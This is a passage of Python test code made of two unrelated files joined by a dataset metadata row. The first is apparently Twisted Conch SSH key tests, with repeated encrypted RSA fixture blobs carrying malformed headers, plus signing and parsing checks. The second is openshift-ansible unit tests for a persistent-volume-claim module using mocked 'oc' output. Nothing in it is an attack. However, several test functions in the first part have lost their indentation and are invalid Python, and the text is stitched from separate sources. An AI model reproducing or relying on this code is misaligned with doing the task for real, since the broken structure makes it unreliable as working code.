CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----""", passphrase='encrypted')
    # key with invalid encryption type (an unrecognized cipher name in
    # the DEK-Info header)
    self.assertRaises(
        keys.BadKeyError, keys.Key.fromString,
        """-----BEGIN ENCRYPTED RSA KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: FOO-123-BAR,01234567
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----""", passphrase='encrypted')
    # key with bad IV (AES) - the IV hex string is too short
    self.assertRaises(
        keys.BadKeyError, keys.Key.fromString,
        """-----BEGIN ENCRYPTED RSA KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,01234
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----""", passphrase='encrypted')
    # key with bad IV (DES3) - same malformed IV, triple-DES cipher
    self.assertRaises(
        keys.BadKeyError, keys.Key.fromString,
        """-----BEGIN ENCRYPTED RSA KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,01234
4Ed/a9OgJWHJsne7yOGWeWMzHYKsxuP9w1v0aYcp+puS75wvhHLiUnNwxz0KDi6n
T3YkKLBsoCWS68ApR2J9yeQ6R+EyS+UQDrO9nwqo3DB5BT3Ggt8S1wE7vjNLQD0H
g/SJnlqwsECNhh8aAx+Ag0m3ZKOZiRD5mCkcDQsZET7URSmFytDKOjhFn3u6ZFVB
sXrfpYc6TJtOQlHd/52JB6aAbjt6afSv955Z7enIi+5yEJ5y7oYQTaE5zrFMP7N5
9LbfJFlKXxEddy/DErRLxEjmC+t4svHesoJKc2jjjyNPiOoGGF3kJXea62vsjdNV
gMK5Eged3TBVIk2dv8rtJUvyFeCUtjQ1UJZIebScRR47KrbsIpCmU8I4/uHWm5hW
0mOwvdx1L/mqx/BHqVU9Dw2COhOdLbFxlFI92chkovkmNk4P48ziyVnpm7ME22sE
vfCMsyirdqB1mrL4CSM7FXONv+CgfBfeYVkYW8RfJac9U1L/O+JNn7yee414O/rS
hRYw4UdWnH6Gg6niklVKWNY0ZwUZC8zgm2iqy8YCYuneS37jC+OEKP+/s6HSKuqk
2bzcl3/TcZXNSM815hnFRpz0anuyAsvwPNRyvxG2/DacJHL1f6luV4B0o6W410yf
qXQx01DLo7nuyhJqoH3UGCyyXB+/QUs0mbG2PAEn3f5dVs31JMdbt+PrxURXXjKk
4cexpUcIpqqlfpIRe3RD0sDVbH4OXsGhi2kiTfPZu7mgyFxKopRbn1KwU1qKinfY
EU9O4PoTak/tPT+5jFNhaP+HrURoi/pU8EAUNSktl7xAkHYwkN/9Cm7DeBghgf3n
8+tyCGYDsB5utPD0/Xe9yx0Qhc/kMm4xIyQDyA937dk3mUvLC9vulnAP8I+Izim0
fZ182+D1bWwykoD0997mUHG/AUChWR01V1OLwRyPv2wUtiS8VNG76Y2aqKlgqP1P
V+IvIEqR4ERvSBVFzXNF8Y6j/sVxo8+aZw+d0L1Ns/R55deErGg3B8i/2EqGd3r+
0jps9BqFHHWW87n3VyEB3jWCMj8Vi2EJIfa/7pSaViFIQn8LiBLf+zxG5LTOToK5
xkN42fReDcqi3UNfKNGnv4dsplyTR2hyx65lsj4bRKDGLKOuB1y7iB0AGb0LtcAI
dcsVlcCeUquDXtqKvRnwfIMg+ZunyjqHBhj3qgRgbXbT6zjaSdNnih569aTg0Vup
VykzZ7+n/KVcGLmvX0NesdoI7TKbq4TnEIOynuG5Sf+2GpARO5bjcWKSZeN/Ybgk
gccf8Cqf6XWqiwlWd0B7BR3SymeHIaSymC45wmbgdstrbk7Ppa2Tp9AZku8M2Y7c
8mY9b+onK075/ypiwBm4L4GRNTFLnoNQJXx0OSl4FNRWsn6ztbD+jZhu8Seu10Jw
SEJVJ+gmTKdRLYORJKyqhDet6g7kAxs4EoJ25WsOnX5nNr00rit+NkMPA7xbJT+7
CfI51GQLw7pUPeO2WNt6yZO/YkzZrqvTj5FEwybkUyBv7L0gkqu9wjfDdUw0fVHE
xEm4DxjEoaIp8dW/JOzXQ2EF+WaSOgdYsw3Ac+rnnjnNptCdOEDGP6QBkt+oXj4P
-----END RSA PRIVATE KEY-----""", passphrase='encrypted')
def test_fromFile(self):
    """
    Test that fromFile works correctly.
    """
    expected = keys.Key.fromString(keydata.privateRSA_lsh)
    self.assertEqual(keys.Key.fromFile(self.keyFile), expected)
    # An unknown key type name is rejected.
    self.assertRaises(
        keys.BadKeyError, keys.Key.fromFile, self.keyFile, 'bad_type')
    # Supplying a passphrase for an unencrypted key is rejected.
    self.assertRaises(
        keys.BadKeyError, keys.Key.fromFile, self.keyFile,
        passphrase='unencrypted')
def test_init(self):
"""
Test that the PublicKey object is initialized correctly.
"""
obj = Crypto.PublicKey.RSA.construct((1L, 2L))
key = keys.Key(obj)
self.assertEqual(key.keyObject, obj)
def test_equal(self):
"""
Test that Key objects are compared correctly.
"""
rsa1 = keys.Key(self.rsaObj)
rsa2 = keys.Key(self.rsaObj)
rsa3 = keys.Key(Crypto.PublicKey.RSA.construct((1L, 2L)))
dsa = keys.Key(self.dsaObj)
self.assertTrue(rsa1 == rsa2)
self.assertFalse(rsa1 == rsa3)
self.assertFalse(rsa1 == dsa)
self.assertFalse(rsa1 == object)
self.assertFalse(rsa1 == None)
def test_notEqual(self):
"""
Test that Key objects are not-compared correctly.
"""
rsa1 = keys.Key(self.rsaObj)
rsa2 = keys.Key(self.rsaObj)
rsa3 = keys.Key(Crypto.PublicKey.RSA.construct((1L, 2L)))
dsa = keys.Key(self.dsaObj)
self.assertFalse(rsa1 != rsa2)
self.assertTrue(rsa1 != rsa3)
self.assertTrue(rsa1 != dsa)
self.assertTrue(rsa1 != object)
self.assertTrue(rsa1 != None)
def test_type(self):
    """
    Test that the type method returns the correct type for an object.
    """
    expectations = [
        (self.rsaObj, 'RSA', 'ssh-rsa'),
        (self.dsaObj, 'DSA', 'ssh-dss'),
    ]
    for keyObject, keyType, sshName in expectations:
        wrapped = keys.Key(keyObject)
        self.assertEqual(wrapped.type(), keyType)
        self.assertEqual(wrapped.sshType(), sshName)
    # Objects which are not recognized key implementations have no type.
    for bogus in [None, self]:
        self.assertRaises(RuntimeError, keys.Key(bogus).type)
        self.assertRaises(RuntimeError, keys.Key(bogus).sshType)
def test_fromBlob(self):
"""
Test that a public key is correctly generated from a public key blob.
"""
rsaBlob = common.NS('ssh-rsa') + common.MP(2) + common.MP(3)
rsaKey = keys.Key.fromString(rsaBlob)
dsaBlob = (common.NS('ssh-dss') + common.MP(2) + common.MP(3) +
common.MP(4) + common.MP(5))
dsaKey = keys.Key.fromString(dsaBlob)
badBlob = common.NS('ssh-bad')
self.assertTrue(rsaKey.isPublic())
self.assertEqual(rsaKey.data(), {'e':2L, 'n':3L})
self.assertTrue(dsaKey.isPublic())
self.assertEqual(dsaKey.data(), {'p':2L, 'q':3L, 'g':4L, 'y':5L})
self.assertRaises(keys.BadKeyError,
keys.Key.fromString, badBlob)
def test_fromPrivateBlob(self):
"""
Test that a private key is correctly generated from a private key blob.
"""
rsaBlob = (common.NS('ssh-rsa') + common.MP(2) + common.MP(3) +
common.MP(4) + common.MP(5) + common.MP(6) + common.MP(7))
rsaKey = keys.Key._fromString_PRIVATE_BLOB(rsaBlob)
dsaBlob = (common.NS('ssh-dss') + common.MP(2) + common.MP(3) +
common.MP(4) + common.MP(5) + common.MP(6))
dsaKey = keys.Key._fromString_PRIVATE_BLOB(dsaBlob)
badBlob = common.NS('ssh-bad')
self.assertFalse(rsaKey.isPublic())
self.assertEqual(
rsaKey.data(), {'n':2L, 'e':3L, 'd':4L, 'u':5L, 'p':6L, 'q':7L})
self.assertFalse(dsaKey.isPublic())
self.assertEqual(dsaKey.data(), {'p':2L, 'q':3L, 'g':4L, 'y':5L, 'x':6L})
self.assertRaises(
keys.BadKeyError, keys.Key._fromString_PRIVATE_BLOB, badBlob)
def test_blob(self):
    """
    Test that the Key object generates blobs correctly.
    """
    # Each expected blob is a length-prefixed algorithm name followed by
    # the key's length-prefixed numeric components.
    self.assertEqual(keys.Key(self.rsaObj).blob(),
                     '\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x02'
                     '\x00\x00\x00\x01\x01')
    self.assertEqual(keys.Key(self.dsaObj).blob(),
                     '\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x03'
                     '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x02'
                     '\x00\x00\x00\x01\x01')
    # A Key with no underlying key object cannot be serialized.
    badKey = keys.Key(None)
    self.assertRaises(RuntimeError, badKey.blob)
def test_privateBlob(self):
    """
    L{Key.privateBlob} returns the SSH protocol-level format of the private
    key and raises L{RuntimeError} if the underlying key object is invalid.
    """
    self.assertEqual(keys.Key(self.rsaObj).privateBlob(),
                     '\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x01\x01'
                     '\x00\x00\x00\x01\x02\x00\x00\x00\x01\x03\x00'
                     '\x00\x00\x01\x04\x00\x00\x00\x01\x04\x00\x00'
                     '\x00\x01\x05')
    self.assertEqual(keys.Key(self.dsaObj).privateBlob(),
                     '\x00\x00\x00\x07ssh-dss\x00\x00\x00\x01\x03'
                     '\x00\x00\x00\x01\x04\x00\x00\x00\x01\x02\x00'
                     '\x00\x00\x01\x01\x00\x00\x00\x01\x05')
    # A Key with no underlying key object cannot be serialized.
    badKey = keys.Key(None)
    self.assertRaises(RuntimeError, badKey.privateBlob)
def test_toOpenSSH(self):
    """
    Test that the Key object generates OpenSSH keys correctly.
    """
    rsaKey = keys.Key.fromString(keydata.privateRSA_lsh)
    self.assertEqual(rsaKey.toString('openssh'),
                     keydata.privateRSA_openssh)
    self.assertEqual(rsaKey.toString('openssh', 'encrypted'),
                     keydata.privateRSA_openssh_encrypted)
    # The last eight characters of the reference public-key data hold
    # the comment; without a comment the serialization stops before it.
    self.assertEqual(rsaKey.public().toString('openssh'),
                     keydata.publicRSA_openssh[:-8])
    self.assertEqual(rsaKey.public().toString('openssh', 'comment'),
                     keydata.publicRSA_openssh)
    dsaKey = keys.Key.fromString(keydata.privateDSA_lsh)
    self.assertEqual(dsaKey.toString('openssh'),
                     keydata.privateDSA_openssh)
    self.assertEqual(dsaKey.public().toString('openssh', 'comment'),
                     keydata.publicDSA_openssh)
    self.assertEqual(dsaKey.public().toString('openssh'),
                     keydata.publicDSA_openssh[:-8])
def test_toLSH(self):
    """
    Test that the Key object generates LSH keys correctly.
    """
    cases = [
        (keydata.privateRSA_openssh, keydata.privateRSA_lsh,
         keydata.publicRSA_lsh),
        (keydata.privateDSA_openssh, keydata.privateDSA_lsh,
         keydata.publicDSA_lsh),
    ]
    for opensshData, privateLsh, publicLsh in cases:
        key = keys.Key.fromString(opensshData)
        self.assertEqual(key.toString('lsh'), privateLsh)
        self.assertEqual(key.public().toString('lsh'), publicLsh)
def test_toAgentv3(self):
    """
    Test that the Key object generates Agent v3 keys correctly.
    """
    for opensshData, agentData in [
            (keydata.privateRSA_openssh, keydata.privateRSA_agentv3),
            (keydata.privateDSA_openssh, keydata.privateDSA_agentv3)]:
        key = keys.Key.fromString(opensshData)
        self.assertEqual(key.toString('agentv3'), agentData)
def test_toStringErrors(self):
    """
    Test that toString raises errors appropriately.
    """
    # An unrecognized serialization format name is rejected.
    key = keys.Key(self.rsaObj)
    self.assertRaises(keys.BadKeyError, key.toString, 'bad_type')
def test_sign(self):
    """
    Test that the Key object generates correct signatures.
    """
    for privateData, expectedSignature in [
            (keydata.privateRSA_openssh, self.rsaSignature),
            (keydata.privateDSA_openssh, self.dsaSignature)]:
        key = keys.Key.fromString(privateData)
        self.assertEqual(key.sign(''), expectedSignature)
def test_verify(self):
    """
    Test that the Key object correctly verifies signatures.
    """
    for publicData, goodSignature, otherSignature in [
            (keydata.publicRSA_openssh, self.rsaSignature,
             self.dsaSignature),
            (keydata.publicDSA_openssh, self.dsaSignature,
             self.rsaSignature)]:
        key = keys.Key.fromString(publicData)
        # The matching signature over the signed data verifies; the
        # same signature over different data does not, nor does the
        # other algorithm's signature.
        self.assertTrue(key.verify(goodSignature, ''))
        self.assertFalse(key.verify(goodSignature, 'a'))
        self.assertFalse(key.verify(otherSignature, ''))
def test_verifyDSANoPrefix(self):
    """
    Some commercial SSH servers send DSA keys as 2 20-byte numbers;
    they are still verified as valid keys.
    """
    key = keys.Key.fromString(keydata.publicDSA_openssh)
    # Keep only the trailing two 20-byte numbers of the signature,
    # dropping the algorithm prefix.
    bareSignature = self.dsaSignature[-40:]
    self.assertTrue(key.verify(bareSignature, ''))
def test_repr(self):
    """
    Test the pretty representation of Key.
    """
    # repr() lists each numeric component of the key on its own
    # tab-indented line under an "attr <name>:" header.
    self.assertEqual(repr(keys.Key(self.rsaObj)),
                     """<RSA Private Key (0 bits)
attr d:
\t03
attr e:
\t02
attr n:
\t01
attr p:
\t04
attr q:
\t05
attr u:
\t04>""")
| bsd-3-clause |
EricMountain-1A/openshift-ansible | roles/lib_openshift/src/test/unit/test_oc_pvc.py | 60 | 13429 | '''
Unit tests for oc pvc
'''
import copy
import os
import six
import sys
import unittest
import mock
# Removing invalid variable names for tests so that I can
# keep them brief
# pylint: disable=invalid-name,no-name-in-module
# Disable import-error b/c our libraries aren't loaded in jenkins
# pylint: disable=import-error,wrong-import-position
# place class in our python path
module_path = os.path.join('/'.join(os.path.realpath(__file__).split('/')[:-4]), 'library') # noqa: E501
sys.path.insert(0, module_path)
from oc_pvc import OCPVC, locate_oc_binary # noqa: E402
class OCPVCTest(unittest.TestCase):
    '''
    Test class for OCPVC
    '''
    # Baseline module parameters; each test deep-copies and tweaks these.
    params = {'kubeconfig': '/etc/origin/master/admin.kubeconfig',
              'state': 'present',
              'debug': False,
              'name': 'mypvc',
              'namespace': 'test',
              'volume_capacity': '1G',
              'selector': {'foo': 'bar', 'abc': 'a123'},
              'storage_class_name': 'mystorage',
              'access_modes': 'ReadWriteMany'}

    @mock.patch('oc_pvc.Utils.create_tmpfile_copy')
    @mock.patch('oc_pvc.OCPVC._run')
    def test_create_pvc(self, mock_run, mock_tmpfile_copy):
        ''' Testing a pvc create '''
        params = copy.deepcopy(OCPVCTest.params)

        # Canned `oc get pvc` JSON returned after the create succeeds.
        pvc = '''{"kind": "PersistentVolumeClaim",
            "apiVersion": "v1",
            "metadata": {
                "name": "mypvc",
                "namespace": "test",
                "selfLink": "/api/v1/namespaces/test/persistentvolumeclaims/mypvc",
                "uid": "77597898-d8d8-11e6-aea5-0e3c0c633889",
                "resourceVersion": "126510787",
                "creationTimestamp": "2017-01-12T15:04:50Z",
                "labels": {
                    "mypvc": "database"
                },
                "annotations": {
                    "pv.kubernetes.io/bind-completed": "yes",
                    "pv.kubernetes.io/bound-by-controller": "yes",
                    "v1.2-volume.experimental.kubernetes.io/provisioning-required": "volume.experimental.kubernetes.io/provisioning-completed"
                }
            },
            "spec": {
                "accessModes": [
                    "ReadWriteOnce"
                ],
                "resources": {
                    "requests": {
                        "storage": "1Gi"
                    }
                },
                "selector": {
                    "matchLabels": {
                        "foo": "bar",
                        "abc": "a123"
                    }
                },
                "storageClassName": "myStorage",
                "volumeName": "pv-aws-ow5vl"
            },
            "status": {
                "phase": "Bound",
                "accessModes": [
                    "ReadWriteOnce"
                ],
                "capacity": {
                    "storage": "1Gi"
                }
            }
        }'''

        # _run results consumed in order: two not-found lookups drive the
        # create path, then the create itself, then the final fetch.
        mock_run.side_effect = [
            (1, '', 'Error from server: persistentvolumeclaims "mypvc" not found'),
            (1, '', 'Error from server: persistentvolumeclaims "mypvc" not found'),
            (0, '', ''),
            (0, pvc, ''),
        ]

        mock_tmpfile_copy.side_effect = [
            '/tmp/mocked_kubeconfig',
        ]

        results = OCPVC.run_ansible(params, False)

        self.assertTrue(results['changed'])
        self.assertEqual(results['results']['results'][0]['metadata']['name'], 'mypvc')
        self.assertEqual(results['results']['results'][0]['spec']['storageClassName'], 'myStorage')
        self.assertEqual(results['results']['results'][0]['spec']['selector']['matchLabels']['foo'], 'bar')

    @mock.patch('oc_pvc.Utils.create_tmpfile_copy')
    @mock.patch('oc_pvc.OCPVC._run')
    def test_update_pvc(self, mock_run, mock_tmpfile_copy):
        ''' Testing a pvc create '''
        params = copy.deepcopy(OCPVCTest.params)
        params['access_modes'] = 'ReadWriteMany'

        # Existing claim as returned by `oc get`; status.phase is
        # "Bound", which is what blocks the update below.
        pvc = '''{"kind": "PersistentVolumeClaim",
            "apiVersion": "v1",
            "metadata": {
                "name": "mypvc",
                "namespace": "test",
                "selfLink": "/api/v1/namespaces/test/persistentvolumeclaims/mypvc",
                "uid": "77597898-d8d8-11e6-aea5-0e3c0c633889",
                "resourceVersion": "126510787",
                "creationTimestamp": "2017-01-12T15:04:50Z",
                "labels": {
                    "mypvc": "database"
                },
                "annotations": {
                    "pv.kubernetes.io/bind-completed": "yes",
                    "pv.kubernetes.io/bound-by-controller": "yes",
                    "v1.2-volume.experimental.kubernetes.io/provisioning-required": "volume.experimental.kubernetes.io/provisioning-completed"
                }
            },
            "spec": {
                "accessModes": [
                    "ReadWriteOnce"
                ],
                "resources": {
                    "requests": {
                        "storage": "1Gi"
                    }
                },
                "volumeName": "pv-aws-ow5vl"
            },
            "status": {
                "phase": "Bound",
                "accessModes": [
                    "ReadWriteOnce"
                ],
                "capacity": {
                    "storage": "1Gi"
                }
            }
        }'''

        # Same claim with the requested ReadWriteMany access mode; would
        # be the post-update state if the update were allowed.
        mod_pvc = '''{"kind": "PersistentVolumeClaim",
            "apiVersion": "v1",
            "metadata": {
                "name": "mypvc",
                "namespace": "test",
                "selfLink": "/api/v1/namespaces/test/persistentvolumeclaims/mypvc",
                "uid": "77597898-d8d8-11e6-aea5-0e3c0c633889",
                "resourceVersion": "126510787",
                "creationTimestamp": "2017-01-12T15:04:50Z",
                "labels": {
                    "mypvc": "database"
                },
                "annotations": {
                    "pv.kubernetes.io/bind-completed": "yes",
                    "pv.kubernetes.io/bound-by-controller": "yes",
                    "v1.2-volume.experimental.kubernetes.io/provisioning-required": "volume.experimental.kubernetes.io/provisioning-completed"
                }
            },
            "spec": {
                "accessModes": [
                    "ReadWriteMany"
                ],
                "resources": {
                    "requests": {
                        "storage": "1Gi"
                    }
                },
                "volumeName": "pv-aws-ow5vl"
            },
            "status": {
                "phase": "Bound",
                "accessModes": [
                    "ReadWriteOnce"
                ],
                "capacity": {
                    "storage": "1Gi"
                }
            }
        }'''

        mock_run.side_effect = [
            (0, pvc, ''),
            (0, pvc, ''),
            (0, '', ''),
            (0, mod_pvc, ''),
        ]

        mock_tmpfile_copy.side_effect = [
            '/tmp/mocked_kubeconfig',
        ]

        results = OCPVC.run_ansible(params, False)

        # A bound volume is never updated: no change, explanatory message.
        self.assertFalse(results['changed'])
        self.assertEqual(results['results']['msg'], '##### - This volume is currently bound. Will not update - ####')

    @mock.patch('oc_pvc.Utils.create_tmpfile_copy')
    @mock.patch('oc_pvc.OCPVC._run')
    def test_delete_pvc(self, mock_run, mock_tmpfile_copy):
        ''' Testing a pvc create '''
        params = copy.deepcopy(OCPVCTest.params)
        params['state'] = 'absent'

        # Existing claim which the module should delete.
        pvc = '''{"kind": "PersistentVolumeClaim",
            "apiVersion": "v1",
            "metadata": {
                "name": "mypvc",
                "namespace": "test",
                "selfLink": "/api/v1/namespaces/test/persistentvolumeclaims/mypvc",
                "uid": "77597898-d8d8-11e6-aea5-0e3c0c633889",
                "resourceVersion": "126510787",
                "creationTimestamp": "2017-01-12T15:04:50Z",
                "labels": {
                    "mypvc": "database"
                },
                "annotations": {
                    "pv.kubernetes.io/bind-completed": "yes",
                    "pv.kubernetes.io/bound-by-controller": "yes",
                    "v1.2-volume.experimental.kubernetes.io/provisioning-required": "volume.experimental.kubernetes.io/provisioning-completed"
                }
            },
            "spec": {
                "accessModes": [
                    "ReadWriteOnce"
                ],
                "resources": {
                    "requests": {
                        "storage": "1Gi"
                    }
                },
                "volumeName": "pv-aws-ow5vl"
            },
            "status": {
                "phase": "Bound",
                "accessModes": [
                    "ReadWriteOnce"
                ],
                "capacity": {
                    "storage": "1Gi"
                }
            }
        }'''

        # First _run: the claim exists; second _run: the delete succeeds.
        mock_run.side_effect = [
            (0, pvc, ''),
            (0, '', ''),
        ]

        mock_tmpfile_copy.side_effect = [
            '/tmp/mocked_kubeconfig',
        ]

        results = OCPVC.run_ansible(params, False)

        self.assertTrue(results['changed'])

    @unittest.skipIf(six.PY3, 'py2 test only')
    @mock.patch('os.path.exists')
    @mock.patch('os.environ.get')
    def test_binary_lookup_fallback(self, mock_env_get, mock_path_exists):
        ''' Testing binary lookup fallback '''
        # Empty PATH and no file hits: fall back to the bare name.
        mock_env_get.side_effect = lambda _v, _d: ''
        mock_path_exists.side_effect = lambda _: False

        self.assertEqual(locate_oc_binary(), 'oc')

    @unittest.skipIf(six.PY3, 'py2 test only')
    @mock.patch('os.path.exists')
    @mock.patch('os.environ.get')
    def test_binary_lookup_in_path(self, mock_env_get, mock_path_exists):
        ''' Testing binary lookup in path '''
        oc_bin = '/usr/bin/oc'

        mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
        mock_path_exists.side_effect = lambda f: f == oc_bin

        self.assertEqual(locate_oc_binary(), oc_bin)

    @unittest.skipIf(six.PY3, 'py2 test only')
    @mock.patch('os.path.exists')
    @mock.patch('os.environ.get')
    def test_binary_lookup_in_usr_local(self, mock_env_get, mock_path_exists):
        ''' Testing binary lookup in /usr/local/bin '''
        oc_bin = '/usr/local/bin/oc'

        mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
        mock_path_exists.side_effect = lambda f: f == oc_bin

        self.assertEqual(locate_oc_binary(), oc_bin)

    @unittest.skipIf(six.PY3, 'py2 test only')
    @mock.patch('os.path.exists')
    @mock.patch('os.environ.get')
    def test_binary_lookup_in_home(self, mock_env_get, mock_path_exists):
        ''' Testing binary lookup in ~/bin '''
        oc_bin = os.path.expanduser('~/bin/oc')

        mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
        mock_path_exists.side_effect = lambda f: f == oc_bin

        self.assertEqual(locate_oc_binary(), oc_bin)

    @unittest.skipIf(six.PY2, 'py3 test only')
    @mock.patch('shutil.which')
    @mock.patch('os.environ.get')
    def test_binary_lookup_fallback_py3(self, mock_env_get, mock_shutil_which):
        ''' Testing binary lookup fallback '''
        # On py3 the lookup goes through shutil.which instead.
        mock_env_get.side_effect = lambda _v, _d: ''
        mock_shutil_which.side_effect = lambda _f, path=None: None

        self.assertEqual(locate_oc_binary(), 'oc')

    @unittest.skipIf(six.PY2, 'py3 test only')
    @mock.patch('shutil.which')
    @mock.patch('os.environ.get')
    def test_binary_lookup_in_path_py3(self, mock_env_get, mock_shutil_which):
        ''' Testing binary lookup in path '''
        oc_bin = '/usr/bin/oc'

        mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
        mock_shutil_which.side_effect = lambda _f, path=None: oc_bin

        self.assertEqual(locate_oc_binary(), oc_bin)

    @unittest.skipIf(six.PY2, 'py3 test only')
    @mock.patch('shutil.which')
    @mock.patch('os.environ.get')
    def test_binary_lookup_in_usr_local_py3(self, mock_env_get, mock_shutil_which):
        ''' Testing binary lookup in /usr/local/bin '''
        oc_bin = '/usr/local/bin/oc'

        mock_env_get.side_effect = lambda _v, _d: '/bin:/usr/bin'
        mock_shutil_which.side_effect = lambda _f, path=None: oc_bin

        self.assertEqual(locate_oc_binary(), oc_bin)

